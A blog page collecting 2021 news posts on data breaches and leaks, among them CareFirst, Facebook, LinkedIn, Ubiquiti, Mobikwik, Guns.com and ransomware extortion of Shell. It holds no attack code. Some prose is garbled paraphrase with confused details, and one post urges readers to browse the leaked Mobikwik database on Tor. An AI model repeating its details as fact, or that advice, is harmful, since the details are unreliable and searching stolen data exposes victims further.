Search This Blog

Showing posts with label Data Breach. Show all posts

CareFirst Data Breach: Sensitive Information of Customers Leaked Online

 

For the third time in the past six years, cybercriminals have targeted CareFirst BlueCross BlueShield Community Health Plan District of Columbia (CHPDC). The insurance provider had issued a written statement disclosing a data breach of one of its databases, which occurred on January 28. 

CHPDC’s managed IT service provider alerted CHPDC of abnormal behavior impacting CHPDC systems. Considering the long relationship with cyber-attacks the insurance provider immediately decided to engage cybersecurity group CrowdStrike to identify the source of the leak and also notified both the FBI and the Office of the Attorney General for the District of Columbia.

Unfortunately, hackers were able to gain access to a database and stole sensitive information including names, addresses, contact numbers, date of birth, Medicaid identification numbers. After the examination, CHPDC suggested the attack was likely carried out by a ‘sophisticated, foreign cybercriminal gang’ and it was premature to say how many clients had been affected.

“We’ve taken immediate steps to limit the impact of the attack and protect and secure our systems and the information of our enrollees. We’re angry and troubled that anyone would target our enrollees. We’re taking aggressive action on behalf of all those we serve to ensure they are supported and notified as more information becomes available,” George Aloth, CEO of CHPDC, stated.

The company has decided to provide free two-year credit, identity theft monitoring, and a website with information on data breaches to all the enrolled clients who were affected due to this data breach.

The 2014 cyber-attack on CHPDC was one of the largest healthcare breaches ever reported, nearly 1.1 million customers were affected. Threat actors targeted a single database that contained information about CareFirst members and others who accessed its websites and services. CareFirst learned of the data breach on April 21, 2015, nearly one year later after they hired Mandiant, a leading cybersecurity company. 

In October 2020, the FBI, The Department of Health and Human Services (HHS), and the Department of Homeland Security’s Cybersecurity and Infrastructure Agency (CISA) alerted that cybercriminals were stepping up ransomware attacks on health sector groups as the organizations were involved in Covid-19 treatment and research.

The User Data of Swarmshop Card Shop has been Leaked Online

 

The details of the Swarmshop Darknet payment card market have been removed for the second time in two years and published on a competing underground website. The breach includes all of Swarmshop's records and all the data exchanged on the platform with the stolen credit card. 

Group-IB, the global threat chasing business, has detected that Swarmshop credit card shop consumer data was leaked on the internet on 17 March 2021. As per the Group IB, details of 623,036 bank cards provided by banks in the US, Canada, United Kingdom, China, Singapore, France, Brazil, Saudi Arabia, and Mexico have been dumped into the Swarmshop dump. 

Though recently, Swarmshop Carding Store seems to have been a common, illegal digital shopping market where cybercriminals were permitted to sell and buy stolen card and banking information. However, it remains unclear as to who has extracted this information, or how and when. The leak revealed massive amounts of data comprising data on four website operators, 90 sellers, and 12,250 purchasers. The researchers have written, "The dump included criminals' nicknames, hashed passwords and account balance and contact details for some entries.” 

The researchers also found that “498 sets of online banking account credentials and 69,592 sets of US Social Security Numbers and Canadian Social Insurance Numbers.” 

The one who breached Swarmshop did not warn the hacker and only sent a message with a connection to the database. At first, the administrators of the Card Shop claimed that the information was linked to a prior breach of the platform by a hacker in January 2020. However, their passwords were requested to be modified. Group-IB reviewed the current dump and found it fresh based on the most recent timestamps for user operation. 

“While underground forums get hacked from time to time, card shop breaches do not happen very often,” Dmitry Volkov, Group-IB’s CTO, said in a statement. “In addition to buyers’ and sellers’ data, such breaches expose massive amounts of compromised payment and personal information of regular users.” 

For decades, hackers have hacked other hackers. It seems quite simple for them to gain access to new hacking instruments, dumps, cards, PII, and value products than to hack people who steal them first of all. It is not surprising that Swarmshop has been successfully breached several times. Like everybody else, cybercriminals have security problems. It only shows that cybersecurity is a hard issue regardless of who you are. 

In Swarmshop's case, researchers seem to think that the attack is yet another criminal's business. About one year ago, a set of information has also been compromised. The site underwent a similar attack. No matter who is responsible, researchers believe that the breach would affect Swarmshop's position on cybercrime.

Credit Card Hacking Forum Compromised 300,000 User Accounts Due To A Data Breach

 

As per the information provided by the website ‘Have I Been Pwned’, Carding Mafia, a credit card stealing and trading platform that exposed nearly 300,000 user accounts, has indeed been compromised. However, Motherboard indicates that there was no indication that its consumers were warned on either the Carding Mafia Forum or its community telegram channel. According to forum data, Carding Mafia has more than 500,000 users. 

The breach potentially released 297,744 users' e-mail addresses, IP addresses, usernames, and hashed credentials. The authenticity of stolen data was verified by the founder of Have I Been Pwned, Troy Hunt. Hunt has stated that the carding site identifies e-mail addresses leaked through the 'forgot password' feature although it declined to identify and use any other random e-mail addresses. The carding website cautioned that when anonymous e-mails are submitted, a notification pops up which reads, “you have not entered an email address that we recognize” as per the Motherboard. 

The data reportedly hacked from this carding facility was 990 GB in the size of 660,000 artworks and 130,000 threads, according to the screenshots shared by Motherboard. The accused hacker presented the database through their inbox for free. Researchers noticed some months ago that too many cybercrime payments were being shifted to private message applications, to prevent alerting officials and security researchers that typically warn of compromised organizations. 

It is not unusual for hackers to post the stolen data publicly on popular hacking forums to gain "street cred" or a reputation. One can use this credibility to claim data or even request premium prices. Hackers find it harder to individually sell hacked information and use data brokers to divide over-generous fees. 

Hacker on hacker Cybercrime is a common way to stifle competitiveness by offering similar services to rival gangs. It may also be a simple way to get the gigabytes of compromised data free of charge or to boost the credibility of the hacker. Although IP information could encourage law enforcement agencies to identify the whereabouts of cybercriminals, as most criminals use VPN services to hide their real internet addresses. In order to register for hacking websites, hackers also use untraceable email addresses from vendors including Mailinator. However, new hackers are likely to be mistaken by logging into their actual IP addresses or by using real email addresses on the carding hacking pages. 

Meanwhile, Ilia Kolochenko, Founder and Chief Architect at ImmuniWeb, says: “Most of the compromised accounts have fake data and IPs from anonymous VPNs or proxies that are not likely to bring much actionable evidence to law enforcement agencies for investigation. Moreover, even the Western law enforcement agencies are currently underequipped to investigate and prosecute cybercrime on a large scale and will probably not initiate investigatory operations after the leak.”

Threat Actors are Using Telegram & Google Forms to Obtain Stolen User Data

 

Security researchers have noted an increase in the misuse of legitimate services such as Google Forms and Telegram for gathering user data stolen on phishing websites. Emails remain the popular method among threat actors to exfiltrate stolen data but these methods foreshadow a new trend in the evolution of phishing kits.

After analyzing the phishing kits over the past year, researchers at cybersecurity company Group-IB observed that more of these tools permit collecting users' stolen data using Google Forms and Telegram. 

What is a phishing kit? 

A phishing kit is a toolset that helps design and run phishing web pages mimicking a particular brand or firm or even several at once. Phishing kits are often sold to those hackers who do not have exceptional coding skills. These phishing kits allow them to design an infrastructure for large-scale phishing campaigns.

By extracting the phishing kit, security researchers can examine the methodology used to carry out the phishing attack and figure out where the stolen data is sent. Besides, a thorough examination of the phishing kit helps researchers in detecting digital footprints that might lead to the developers of the phishing kit.

Latest trends of 2020 

Security researchers at Group-IB identified more than 260 unique brands which were on the target list of cybercriminals, most of them being for online services (30.7% - online tools to view documents, online shopping, streaming service, and more,) email customers (22.8%), and financial organizations (20%). The most exploited brands of 2020 were Microsoft, PayPal, Google, and Yahoo.

Another trend the researchers noticed was that the developers of phishing kits were double-dipping to increase their profits by adding code that copies the stream of stolen data to their network data host. Security researchers explained that one method is by configuring the ‘send’ function to deliver the information to the email provided by the buyer of the phishing kit as well as the ‘token’ variable linked with a concealed email address.

“Phishing kits have changed the rules of the game in this segment of the fight against cybercrime. In the past, cybercriminals stopped their campaigns after the fraudulent resources had been blocked and quickly switched to other brands. Today, they automate their attacks and instantly replace the blocking phishing websites with new web pages,” Yaroslav Kargalev, Deputy Head at CIRT-GIB, stated.

Data Stolen from 500 Million LinkedIn Users Leaked Online

 

Just days after a Facebook data leak was revealed, security experts have discovered another one, this time the victim being LinkedIn as a huge pile of data containing the personal information of 500 million LinkedIn users has been found on sale on a popular hacking forum.

To prove the legitimacy of the data leak, the poster has included nearly 2 million records as a sample, which forum members can view for $2 worth of forum credits. The leaked data includes user names, contact numbers, email addresses, links to other social media profiles, and users’ workplace details. While, the data does not contain credit card information, legal documents, or other financial information that could be used for scams.

However, security researchers warned that lack of financial information does not mean that it is not dangerous. Hackers could misuse the data to create detailed profiles of their potential victims and then conduct targeted phishing or social engineering attacks. They could also use the information to spam emails and contact numbers, or brute-force the passwords of LinkedIn profiles and linked email addresses. 

The threat actor has demanded a minimum of ‘four-digit sum in turn for access to the entire 500 million-user databases. Cybernews confirmed that the data in the sample was scraped from LinkedIn, although it remains unclear if the leaked files contain the latest information, or if it was taken from the previous data breach.

5 steps to protect your LinkedIn account

Across the globe, there are nearly 740 million user profiles on LinkedIn. If we presume that the hacker is telling the truth, then the data of 500 million users is on the hacking forum. Considering that, LinkedIn users should take all the necessary precautions to protect their accounts by:

• Creating a strong and unique password, and storing it in a password manager.

• Enabling two-factor authentication (2FA) on all your online accounts.

• Downloading strong anti-phishing and anti-malware software. 

• Learning to identify phishing emails and text messages.

• Reporting to the cyber police if any problem arises. 

This is not the first time that hackers have targeted LinkedIn users. In 2012, hackers were able to steal password hashes of nearly 170 million LinkedIn users. The stolen data was in the private hands for almost 4 years before appearing on the dark web in 2016.

Facebook Data Breach: How To Check If Your Details Were Leaked

 

By now you must have heard that the social network giant ‘Facebook’ has witnessed a very large-scale user data breach that has affected more than 533 million users from 100 plus states. 

Cybercriminals leaked the credentials on online serves that included Facebook IDs, addresses, photos, and other details and in certain cases email addresses. Ironically, it has been seen that the personal data of Facebook’s founder and CEO-Mark Zuckerberg, was also leaked in that breach. 

This article will guide you to check whether your personal data has been breached or not, as a part of the breach. Additionally, you also can check recent leaks or other past leaks in the post. 

The first step is to just go and visit Have I Been Pwned, it will ask for your account details such as your email address or logged-in phone number. If your email address (and the associated account) has been compromised, it will let you know, moreover, not only in regard to the recent breach but it will also give you an account of any other breaches in which your personal data may have been compromised.

"Have I Been Pwned" has been created by a security researcher named Troy Hunt, who was initially skeptical of adding a phone number option while searching breaches due to certain privacy risks, but ended up adding the feature. 

Another tool is a site called The News Each Day, wherein you can just enter your phone number, and then technical information will appear on your screen informing whether your data has been compromised or not. 

Additionally, all the users are advised to change the passwords of the compromised sites alongside, looking out for the best endpoint protection tools that are out there. Users are also recommended to verify the security of sites and apps around to keep their identity safe and secure, for which they are advised to rely on the best identity theft protection.

The data of potential borrowers of Bank Dom.RF are being sold on the Internet

 The data was obtained as a result of a leak. A representative of the bank explained its vulnerability in the remote filing of initial applications for cash loans

Data about people who applied for a loan from Bank Dom.RF were put up for sale on the Internet. The bank confirmed the leak. The Central Bank is conducting a check.

The data of Russians was put up for sale on a specialized website. The announcement was published on April 3. According to the owners, they have more than 100,000 records of those who have applied for a bank loan. The records date back to 2020-2021. They may include information about the loan amount request, phone numbers, email addresses, full names, date of birth, passport information, TIN, SNILS, home and work addresses, job title, income and proxy information. The database sells for 100 thousand rubles ($1,308), individual lines for 7-15 rubles ($0.09 - 0.20).

Bank Dom.RF belongs to the same name financial development institution in the housing sector, which is fully controlled by the state. It is in the top 20 banks in terms of capital and in the top 3 in terms of the mortgage portfolio. It was formed in 2017 on the basis of the bank Rossiyskiy Kapital, which is being reorganized.

Dom.RF reported that the leak was due to a vulnerability in remote initial cash loan applications. The bank notes that the data prevents access to customer accounts. "As part of operational work, it was eliminated in a short time, at the moment all the bank's systems are functioning normally. For preventive purposes, the security service of Dom.RF checked the integrity of all other systems of the bank and found no violations," reported the bank.

Russian media have already checked the data from a database. Six people responded and four of them confirmed that they had applied to the bank for a loan or were already its clients.

Furniture Retailer Vhive's Data Breach: Customer Information Leaked Online, Under Investigation

 

The officials are investigating a data breach at local furniture retailer Vhive, which resulted in customer’s personal information such as phone numbers and physical addresses being leaked online. In response to questions from The Straits Times on Saturday, April 3, police confirmed that a report had been filed on the matter.

According to the company, information compromised in the hack includes customers' names, physical and e-mail addresses, and mobile numbers, but it did not include identification numbers or financial information.

In a Facebook post on March 29, Vhive announced that its server was hacked on March 23 and that it was working with police and other relevant agencies, as well as IT forensic investigators, to investigate the breach. 

"All financial records in relation to purchases made with Vhive are held on a separate system which was not hacked," said Vhive. 

"We are truly sorry for the incident and stand ready to assist you if you require immediate help," Vhive told customers. 

According to ST's checks on Saturday afternoon, Vhive's e-mail servers were also compromised. The website only displayed a warning of the cyber attack, while the company's stores on the online shopping platforms Lazada and Shopee were open for business. 

The Altdos hacking group, which operates mainly in Southeast Asia, has claimed responsibility for the breach. In an email to affected customers on Saturday, Altdos said it had hacked into Vhive three times in nine days and claimed to have stolen information of over 300,000 customers as well as nearly 600,000 transaction records. 

The group announced that it will publish 20,000 customer records daily until its demands to Vhive’s management are met. In its Facebook statement, Vhive said it would be closely guided by the forensic investigator and authorities on the steps to protect its systems and ensure that customers can conduct transactions securely. 

In previous hacking incidents, Altdos has stolen customer data from companies, blackmailed the compromised company, leaked the data online if its requirements were not met, and publicized the violations. The cyberattacks were mainly focused on stock exchanges and financial institutions. 

In January, Altdos claimed to have broken into the IT infrastructure of the Bangladeshi conglomerate Beximco Group and stole data from 34 of its databases. 

Last December, it hacked a Thai securities trading firm and posted stolen data online when the firm allegedly failed to confirm her emails and claims.

Data Breach at Facebook Leaks Information of 533 Million Users

 

A major privacy violation by hackers allegedly took the data of almost 533 million users of Facebook from 106 countries to be posted online for free. More than 533 million private details that were posted online include records of over 32 million users in the US, 11 million users in the UK, and 6 million users in India. This breach is perhaps the largest in the social media giant’s history of breaches. Details such as phone numbers, Facebook IDs, full names, sites, birthdates, bios, and even e-mail addresses of several people are included in the breach. 

A spokesman for Facebook stated that the data had been scrapped on the social website due to a security vulnerability that had already been patched in 2019. The vulnerability was identified in 2019, enabling millions of Facebook servers to remove telephone numbers. In August 2019, the social media outlet was kicked off by the vulnerability. 

On Saturday 3rd of April, Alon Gal, who is the CTO of Hudson Rock, the CIC, detected the leaks and confirmed the same via Twitter. Gal is the very same researcher who had blown the whistle of an initially accessible Telegram bot in January, which seems to be the same, leaking database. While the individual behind the bot sold the leaked figures to the people willing to pay for it, this time the disparity is that all these figures are now freely accessible on a low-level hacking forum. After the vulnerability that Facebook fixed in 2019, the database was reported to have been leaked, this is because not many people frequently alter their telephone numbers so that the data can be very accurate. In the past, this information was sold by a person who sold a telegraph bot to sell a telephone number or a Facebook ID for $20,000, or in bulk for $5,000. It is now widely available to anyone with certain technical know-how. 

“A database of that size containing the private information such as phone numbers of a lot of Facebook’s users would certainly lead to bad actors taking advantage of the data to perform social engineering attacks [or] hacking attempts,” added Gal. 

This is not the first time Facebook is spotted with a data leak. Data from 419,000,000 Facebook and 49,000 Instagram users were displayed in online databases in 2019. In that meme year, data of 267 million users had been exposed to an additional violation. In the meantime, there was the infamous Cambridge Analytica scandal that, for its data collection practices, was perhaps the first time the Zuckerberg company had come under the radar. 

Ubiquiti Shares Fall After Reportedly Downplaying 'Catastrophic' Data Breach


New York City-based IoT device maker Ubiquiti recently disclosed a data breach that was downplayed. After news of the catastrophic data breach, the shares of the company dropped drastically this week. 

In January, Ubiquiti informed customers that unauthorized access to certain IT systems hosted by an unidentified third-party cloud provider had been discovered. The company said at the time that it had found no evidence of user data being compromised, but it could not rule it out so it advised the customers to change their passwords. 

When Ubiquiti disclosed the security breach, it only had a small impact on its stock and the value of its shares has increased tremendously since, from roughly $250 per share on January 12 to $350 per share on March 30. Ubiquiti shares are now down to $290 at the time of publishing, following the news that the breach may have been bigger than the company led customers and investors to believe. 

On Tuesday, March 30, cybersecurity blogger Brian Krebs reported that he discovered from someone involved in the response to the breach that Ubiquiti "massively downplayed" an incident that was actually "catastrophic" in order to reduce the effect on the company's stock market value. 

According to Krebs' source, the intruder obtained access to Ubiquiti's AWS servers and then tried to extort 50 bitcoin (worth approximately $3 million) from the company to keep quiet about the hack. As per the source, "the intruder acquired obtained privileged credentials from the Ubiquiti employee’s LastPass account and “gained root administrator access to all Ubiquiti AWS accounts, including all S3 data buckets, all application logs, all databases, all user database credentials, and secrets required to forge single sign-on (SSO) cookies”. The hacker allegedly had access to Ubiquiti cloud-based devices through remote authentication. 

Ubiquiti released a statement on Wednesday in response to Krebs' report, stating that it could not comment further due to an ongoing law enforcement investigation. “In response to this incident, we leveraged external incident response experts to conduct a thorough investigation to ensure the attacker was locked out of our systems,” the company stated. “These experts identified no evidence that customer information was accessed or even targeted. The attacker, who unsuccessfully attempted to extort the company by threatening to release stolen source code and specific IT credentials, never claimed to have accessed any customer information. This, along with other evidence, is why we believe that customer data was not the target of, or otherwise accessed in connection with, the incident.” 

At least two law firms are investigating whether Ubiquiti violated federal securities laws and are urging the company’s investors to contact them.

Ubiquiti has been Covering up a Data Breach

 

Ubiquiti, an organization whose prosumer-grade routers have gotten synonymous with security and manageability is being blamed for concealing a “catastrophic” security breach — and following 24 hours of silence, the organization has now given a statement that doesn't deny any of the whistle-blower’s claims. 

In January, the creator of routers, Internet-connected cameras, and other networked gadgets, revealed what it said was “unauthorized access to certain of our information technology systems hosted by a third-party cloud provider.” The notification said that, while there was no proof the intruders accessed client information, the organization couldn't preclude the likelihood that they got clients' names, email addresses, cryptographically hashed passwords, addresses, and telephone numbers. Ubiquiti suggested clients to change their passwords and enable two-factor authentication.

 Initially, Ubiquiti emailed its clients about a supposedly minor security breach at a “third-party cloud provider” on January 11th but found out that the cybersecurity news site KrebsOnSecurity is reporting that the breach was far more awful than Ubiquiti let on. A whistle-blower from the organization who spoke to Krebs guaranteed that Ubiquiti itself was breached and that the organization's legal team forestalled efforts to precisely report the dangers to customers. 

The breach comes as Ubiquiti is pushing—if not outright requiring—cloud-based accounts for clients to set up and regulate gadgets running newer firmware renditions. An article says that during the underlying setup of an UniFi Dream Machine (a popular router and home gateway appliance), clients will be incited to sign in to their cloud-based account or, on the off chance that they don't have one, to make an account. 

Brian Krebs of KrebsOnSecurity wrote, "In reality, Adam (the fictitious name that Brian Krebs of KrebsOnSecurity gave the whistleblower) said, the attackers had gained administrative access to Ubiquiti’s servers at Amazon’s cloud service, which secures the underlying server hardware and software but requires the cloud tenant (client) to secure access to any data stored there." 

“They were able to get cryptographic secrets for single sign-on cookies and remote access, full source code control contents, and signing keys exfiltration,” Adam said.

Man Indicted In Kansas Water Facility Breach

 

Today the US Department of Justice charged a Kansas man for breaching a public water system and trying to shut down the water functioning process with the intention of damaging the local community. 

The official statement has been posted on Wednesday by the Department of Justice (DOJ); The 22-year-old man named Wyatt A. Travnichek, accused of hacking into the computer system of the local water utility is a native of Ellsworth County, Kan. He was well aware of the public damage that could be caused by getting access to the Ellsworth County Rural Water District's (also known as Post Rock Rural Water District) computer system with illegal means. He tried to sabotage the water running system, according to the sources. 

The episode first appeared on 27 March 2019, when Post Rock experienced an uncertified remote trespass the facility system and successfully shut down the whole functioning operations. 
Lance Ehrig, Special Agent in Charge of EPA’s Criminal Investigation Division in Kansas said that “By illegally tampering with a public drinking water system, the defendant threatened the safety and health of an entire community…”

“…EPA and its law enforcement partners are committed to upholding the laws designed to protect our drinking water systems from harm or threat of harm. Today’s indictment sends a clear message that individuals who intentionally violate these laws will be vigorously prosecuted.” 

Nevertheless, the court’s documents had not mentioned whether Travnichek’s operation was successful or not. Additionally, the court did not explain how the operation was detected. In this regard, the officials stated that Travnichek was an employee of the Post Rock Rural Water District from January 2018 to January 2019 until he resigned from the facility in January 2019. 

Post Rock provides water facilities around eight Kansas counties. Part of Travnichek's job was to log in to the Post Rock computer system to monitor the plant after hours, but he ended up exploiting the system by illicitly accessing it. 

"He logged in remotely to Post Rock Rural Water District's computer system and performed activities that shut down processes at the facility which affect the facility's cleaning and disinfecting procedures with the intention of harming the Ellsworth County Rural Water District No. 1," the document further reads.

Dutch Privacy Watchdog fines Booking.com €475K



On Wednesday, the Dutch Data Protection Authority reported that it had fined online travel agency Booking.com €475,000 for failing to disclose a data security incident within the required timeframe.

The fine was imposed by the Dutch data protection authority as the company is legally headquartered in Amsterdam. It came after criminals stole the personal data of over 4,000 Booking.com customers, including over 300 victims' credit card information. The cybercrooks attempted to phish the card information of others by posing as Booking.com employees over the phone.

Booking.com witnessed a similar incident in the past in November 2020, wherein the data of millions of its customers was jeopardized. The investigation revealed that the breach was caused due to Prestige Software which stored customers’ payment details with no protection. Any customer who had booked with the company since 2013 was affected by the breach. 

In an official statement, while announcing the fine, VP of Dutch regulator Monique Verdier said: "This is a serious violation. A data breach can, unfortunately, happen anywhere, even if you have taken good precautions. But to prevent damage to your customers and the recurrence of such a data breach, you have to report this in time."

The travel company detected the data breach on January 13, 2019, but did not alert the Data Protection Authority until February 7, although the incident should have been reported within 72 hours, Booking.com notified affected customers on February 4th. 

Of the delay, Booking.com said: "We, unfortunately, didn't get the matter escalated as fast as we would have liked internally. However, we have since implemented measures to further improve awareness and education amongst our partners and the employees who support them closely, with an aim of further optimizing the speed and efficiency of our internal reporting channels, which is an ongoing and iterative process." 

The company in an emailed statement also stated, “We have since taken additional steps to improve awareness and education amongst our partners and employees on important privacy measures and general security processes, while also working to further optimize the speed and efficiency of our internal reporting channels. The protection and security of personal data is and will remain a top priority at Booking.com.”

Shell’s Employees’ Visas Dumped Online as part of Extortion Attempt

 



Royal Dutch Shell became the latest corporation to witness an attack by the Clop ransomware group. The compromised servers were rebuilt and brought into service with a new Accellion security patch; the security patch eliminates the vulnerabilities and enhances security controls to detect new attacks and threats. 

"A cyber incident impacted a third-party, Accellion, software tool called the File Transfer Appliance (FTA) which is used within Shell," stated Shell spinner. In a statement last week, Shell confirmed that it too was affected by the security incident but it has only affected the Accellion FTA appliance which is used to transfer large data files securely by the company. 

In an attempt to bribe the company into paying a ransom, the criminals behind the malware have siphoned sensitive documents from a software system used by Shell and leaked some of the data online, including a set of employees' passports and visa scans. The idea being that once the ransom is paid, no further information will be released into the public domain. 

As stated by Shell, the data accessed during a “limited window of time” contained some personal data together with data from Shell companies and some of their stakeholders. The company to downplay the impact stated that “there is no evidence of any impact to Shell’s core IT systems,” and the server accessed was “isolated from the rest of Shell’s digital infrastructure.” But it did acknowledge that the crooks had probably grabbed “some personal data and data from Shell companies and some of their stakeholders.” 

Previously this month, files from infosec outfit Qualys, including purchase orders, appliance scan results, and quotations also surfaced on the extortionists' hidden site. Other victims include Canadian aerospace firm Bombardier, which had details of a military-grade radar leaked, London ad agency The7stars, and German giant Software AG.

The group has now posted several documents to its Tor-hidden website, including scans of supposed Shell employees' US visas, a passport page, and files from its American and Hungarian offices, in order to persuade Shell to compensate the hackers and prevent more stolen data from leaking. 

According to BleepingComputer, to stack up the pressure, the Clop gang now e-mails its victims' to warn them that the data is stolen and will be leaked if a ransom is not paid.

US Based, Ubiquiti Inc. covers up a Catastrophic Data Breach, Claims a Whistle-blower

 

Ubiquiti Inc., a major provider of cloud-enabled Internet of Things (IoT) equipment such as routers, network video recorders, and surveillance cameras, announced on the 11th of January that their customer account information had been compromised due to a breach involving a third-party cloud service provider. According to a whistle-blower involved, in the response to the breach, Ubiquiti significantly downplayed a "catastrophic" incident in order to mitigate the stock price, and the third-party cloud provider assertion was a hoax. 

Ubiquiti, whose consumer-grade routers have now been associated with security and manageability, is accused of concealing a "catastrophic" security breach. The company said that someone gained "unauthorized access" to the company's servers, which were operated by a "third-party cloud provider" and where data for the ui.com web portal, was stored. 

The vendor claimed that the intrusion contained names, email addresses, and likely hashed password credentials, as well as residential addresses and phone numbers of customers. But they did not indicate how many customers were affected. 

Since Ubiquiti reportedly left root administrator logins in a LastPass account, hackers had complete access to the company's AWS servers, and they could have accessed any Ubiquiti networking hardware that customers had installed up to monitor through the company's cloud service. 

When Ubiquiti eventually released a statement, it was far from reassuring — in truth, it was woefully inadequate. The company stated again that there was no proof that any user data had been hacked or stolen. 

However, as the security specialist, Krebs points out, the whistle-blower claimed clearly that the organization does not keep logs on who accessed or did not access the compromised servers, which would serve as evidence. The statement from Ubiquiti also states that the hacker tried to extort money from the company. However, the whistle-blower who "participated" in the security breach investigation told security specialist Brian Krebs a few months later that the event was even worse than it appeared and could be characterized as "catastrophic." The source reported to KrebsOnSecurity that perhaps the third-party cloud provider justification was a "fabrication” and that the security breach was "massively downplayed" in an effort to preserve the company's stock value.

The whistle-blower wrote, "It was catastrophically worse than reported, and legal silenced and overruled efforts to decisively protect customers. The breach was massive, customer data was at risk, access to customers' devices deployed in corporations and homes around the world was at risk,” in the letter penned to the European regulators. 

According to Krebs, Ubiquiti IT workers discovered a vulnerability planted by threat actors in late December, which was eliminated in the first week of January. Employee passwords were reportedly rotated until the public was fully informed of the violation when a second vulnerability was found. The cybercriminals approached Ubiquiti and requested 50 Bitcoin (roughly $3 million) in exchange for silence. The seller, on the other hand, remained unresponsive.

Here's How to Safeguard Against Mobikwik Data Breach

 

Cybersecurity researchers claimed that the KYC data of as many as 11 crores Mobikwik users had been leaked and put up for sale on the dark web. However, the Gurugram-based digital wallet company is denying the data breach by stating that they have not discovered any evidence of a data leak.

Rajshekhar Rajaharia, an independent cyber-security researcher was the first person who disclosed the data leak in February. He had said that bank details, email addresses, and other sensitive details of nearly 11 crore Indians were leaked on the dark web. 

Approximately, 8 terabytes (TB) of personal user information were stolen from Mobikwik’s main server by a hacker named ‘Jordan Daven’ and put on dark web platforms on January 20, Rajaharia stated. As a shred of evidence, Jordan Devan emailed the link of the stolen database to PTI and stated that they do not have any other motive of using the data except to acquire it from the company and delete it from their end and also shared the private details of Mobikwik founder Bipin Preet Singh and CEO Upasana Taku from the stolen database. 

When approached, Mobikwik denied the claims and stated, “the company is subjected to stringent compliance measures under its PCI-DSS and ISO Certifications which includes annual security audits and quarterly penetration tests to ensure the security of its platform. As soon this matter was reported, the company undertook a thorough investigation with the help of external security experts and did not find any evidence of breach.” 

Precautionary measures for Mobikwik users 

To check out whether your data is compromised or not, you have to download the Tor browser. It is a free and open-source web that helps you anonymously browse the web. You should also update your Mobikwik account by setting new passwords and setting up two-factor authentication. 

Open this link to access the entire database of the leak that is now online. Search for your data by using your email id or contact number. If nothing pops up, you are safe but if something does pop up then you should immediately contact your bank, and block your cards now.

Data Leak of 10cr Users: ‘The Largest KYC Data Leak in History’

 

According to cybersecurity researcher Rajshekahar Rajaharia, mobile payment app Mobikwik came under attack after the data of 10 crores of its users was posted for sale on a hacker website on the dark web. The alleged data breach was conducted by a group of hackers known as the ‘Ninja Storm,' who have also been selling the ‘leaked' details online since March 26. 

The data is being sold for 1.5 Bitcoins, which is nearly Rs 63 lakhs, as per a post by the hacker community. Ever since tens of thousands of people have taken to Twitter to share screenshots of their personal information being exposed. It is the ‘largest KYC data leak in history,' according to cybersecurity researcher Elliot Laderson. 

Personal information of merchants who obtained loans via Mobikwik is also said to be available for purchase in exchange for bitcoins. Over 4 crore Mobikwik customers' card details and hashes are reportedly included in the leak. 

The Gurugram-based fintech firm has maintained a denial of its involvement in the breach, accusing the researchers who made the infringement public of being "media-crazed" and offering "concocted files" as evidence. "We thoroughly investigated and did not find any security lapses. Our user and company data are completely safe and secure," said a spokesperson from Mobikwik. 

On January 20, a hacker named 'Jordan Daven' took over 8 terabytes (TB) of private user data from Mobikwik's main server and posted it on dark-web websites, according to Rajaharia. “Regular keys and passwords should have been changed and logs should have been monitored to prevent this kind of security compromise,” he said. 

Furthermore, in February, Rajaharia claimed that a hacker was selling Mobikwik user data, including PAN card numbers, Aadhar numbers, debit/credit card numbers, phone numbers, and other personally identifiable information that is typically exchanged mostly during Know Your Customer (KYC) process. 

To complicate things, Mobikwik claims that its technology has not been hacked. In a statement, it said, “Some media-crazed so-called security researchers have repeatedly attempted to present concocted files wasting precious time of our organization as well as members of the media.“ 

It isn't the first time Mobikwik has been the target of a cyber-attack. The business witnessed another information security incident in 2010. 

According to reports, the Reserve Bank of India is keeping an eye on such security breaches and has enacted many new regulations, along with the upcoming payment aggregator and payment gateway guidelines, that will limit customer data exposure to a few databases of approved gateways.

Threat Actor Targets Guns.com, Spills Sensitive Information on Dark Web

 

As the domain name suggests, Guns.com is a major Minnesota, US-based platform to buy and sell guns online. It is also home to news and updates for firearm owners and lovers around the globe. However, on March 9th, 2021, a database seemingly belonging to Guns.com was dumped on the popular dark web site ‘Raid Forums’.

Earlier this week, a large cache of files allegedly stolen from Guns.com also appeared on Raid Forums. The hackers behind this data dump claimed that files contain a complete database of Guns.com along with its source code. They further added that the breach took place somewhere around the end of 2020 and the data was sold privately meaning on Telegram channels or dark web forums.

According to the analysis of Hackread.com, data dump contains substantial gun buyer information including user IDs, full names, nearly 400,000 email addresses, password hashes, physical addresses, zip codes, city, state, magneto IDs, contact numbers, and account creation date.

One of the folders in the leaked database includes customers’ bank account details including full name, bank name, account type, and dwolla IDs. However, credit card numbers or VCC numbers were not leaked. 

The data dump also contains Guns.com login credentials, an Excel file in the database seems to be containing sensitive login details of Guns.com including its administrator’s WordPress, MYSQL, and Cloud (Azure) credentials. However, it is unclear whether these credentials are recent, old, or already changed by the site’s administrators amid the breach.

This can have a devastating effect on the company since all admin credentials including admin emails, passwords, login links, and server addresses are in plain text format. With this kind of sensitive information available from this hack, a skilled hacker could commit several identity fraud schemes, be well equipped to target victims with phishing scams or other malicious activities.

Forex Broker Leaked Customer Records

 

White hat hackers have disclosed a significant leak of client information by online forex dealer FBS Markets. This incorporates a great many confidential records, including names, passwords, email addresses, passport numbers, national IDs, credit cards, financial transactions and more. Details of the security breach, which has since been rectified after the dealer was cautioned, were uncovered by Chase Williams, a white hat hacker and site security expert, on the website WizCase. At this stage it isn't evident whether any of the leaked information has been utilized for deceitful purposes by threat actors.

The information leak was revealed as a part of a progressing WizCase research project that scans for unstable servers, and tries to set up who the proprietors of those servers are. WizCase informed FBS of the issue. Williams said that FBS left a server containing right around 20 TB of information and over 16bn records exposed. Regardless of containing very sensitive financial data, the server was left open without any password protection of encryption. WizCase's group said the FBS data “was accessible to anyone.” “The breach is a danger to both FBS and its customers,” WizCase said. “User information on online trading platforms should be well secured to prevent similar data leaks.”

The broker said, “The protection of our clients privacy is one of the core values of FBS, and we stick to the highest protection standards. FBS has never had such major accidents. In October 2020 we faced an overheating on the server which affected our logs recording. During the time when we were setting up a new ElasticSearch server, several wrong subnet masks were added accidentally, which led to the possibility to access the server for a very limited number of people only, in a certain part of the world.” 

FBS added that it had completed a technical audit and that to its knowledge no information had been downloaded. It has contacted the customers affected and whose information may have been undermined and encouraged them on what to do. FBS has additionally moved to a more encoded VPN and has introduced an intrusion detection system. New rules for working with the forex brokers infrastructure have been applied and other safety efforts have additionally been carried out.

